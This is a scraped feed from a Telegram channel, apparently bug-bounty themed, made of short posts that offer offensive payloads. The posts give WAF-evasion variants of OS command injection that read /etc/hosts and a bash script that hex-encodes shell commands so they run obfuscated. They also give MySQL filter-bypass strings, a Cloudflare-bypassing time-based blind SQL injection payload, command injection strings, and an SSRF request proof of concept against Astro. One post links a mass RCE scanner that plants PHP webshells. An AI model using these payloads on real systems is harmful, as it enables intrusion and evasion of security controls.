Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Easy win for my students. You can enroll for Live courses too - wa.link/brutsecurity
1❀19
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.

Trying OS command injection, but WAF blocks every times?

❌ cat /etc/hosts

βœ… tac /e\t\c/h\o\s\t\s
βœ… tac${IFS}/e\t\c/h\o\s\t\s
βœ… tac /e*c/h*st*
βœ… tac /e{t,c}*/{o,h}*s*{s,t}
βœ… tac /??c/??sts

Let me know guy's you all wants more or not like that?
1❀14😱11πŸ”₯6πŸ‘2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? ❌ cat /etc/hosts βœ… tac /e\t\c/h\o\s\t\s βœ… tac${IFS}/e\t\c/h\o\s\t\s βœ… tac /e*c/h*st* βœ… tac /e{t,c}*/{o…
This is for copy cats who copy my posts and share without cradit:

Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.

~DarkShadow
1🀝9❀5🫑4πŸ”₯2πŸ—Ώ2
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.

βœ…
https://github.com/ill-deed/CVE-2025-34085-Multi-target
πŸ‘5
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!

❎WAF block: whoami
βœ…WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'

✨Bash script:

#!/bin/bash
str="$1"
out=""
for ((i=0; i<${
#str}; i++)); do
    char="${str:i:1}"
    ascii=$(printf '%d' "'$char")
    hex=$(printf '%02x' "$ascii")
    out="${out}\\x${hex}"
done
echo "$'$out'"


Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!

#bugbountytips #bypass
🫑18πŸ”₯7❀5
⚑️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. βš”οΈ by @BRuteLogic

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`


#infosec #cybersec #bugbountytips
❀11
Hey Hunter’s,
DarkShadow is here back again!

Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.

πŸ‘‡πŸ»Like:
parameter=value id

Now Guys simply show your love ❀️

#bugbountytips #rce
❀20πŸ”₯7
πŸ›‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) β†’ 403 Forbidden

βœ… Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)



πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

βœ…Credit: @nav1n0x
1❀11πŸ‘2
Hey Hacker's
Cloudflare was down for few minutes. Do you noticed?πŸ™‚
πŸ—Ώ20πŸ‘7πŸ”₯5😁2❀1
Het Hunter's,
DarkShadow here back again!

βœ…CRLF injection ExplainπŸ”₯

This vulnerability allow an attacker to add there custom header on the responds! If you can inject \r\n.


☠️Impact (it can chain with):
1. XSS
2. open redirection
3. Cache Poisoning
4. Session Fixation [Inject custom Set-Cookie: eaders]
5. Inject Access-Control-Allow-Origin: * [make CORS]
6. CORS bypass to Sensitive Info Leak
7. Web Cache Deception
8. Phishing via Responds manipulation [\r\n\r\n<h1>Hacked</h1>]

Now Guy's show your love ❀️

#bugbountytips #crlf
❀31πŸ‘2
🚨CVE-2025-64495 : Open WebUI Stored DOM XSS Vulnerability Leading to
ATO/RCE

πŸ”₯POC - https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch

πŸ‘‡Dork
HUNTER : product.name="open-webui"
Please open Telegram to view this post
VIEW IN TELEGRAM
❀12
Hey,
if you feel anything here could be improved, drop your suggestion please
:)
🀝15
:V
πŸ”₯17❀6
Hey Hunter's,
DarkShadow here back again!

if you ever got a LFI vector parameter, then not just try LFI payloads.

Parameter: &Path= ❎LFI βœ…RCE

Payload for RCE: "|id||"

#bugbountytips #rce
❀18πŸ”₯8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎

Check it out! πŸ‘‡
πŸ”—
https://github.com/kevin-mizu/domloggerpp
πŸ”₯7❀3
Hey Hunter’s,
DarkShadow here back again!

✨Astro 2.16.0-5.15.5 all are vulnerable by critical SSRF🀯

β˜‘οΈPOC:
GET / HTTP/1.1
Host: TARGET
x-forwarded-proto: BURP_URL

Guy’s this is a critical SSRF not blind or out of band.
❀21πŸ—Ώ6😁1
πŸ”₯ Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist

βœ… https://github.com/ImAyrix/fallparams
❀15πŸ”₯5😱3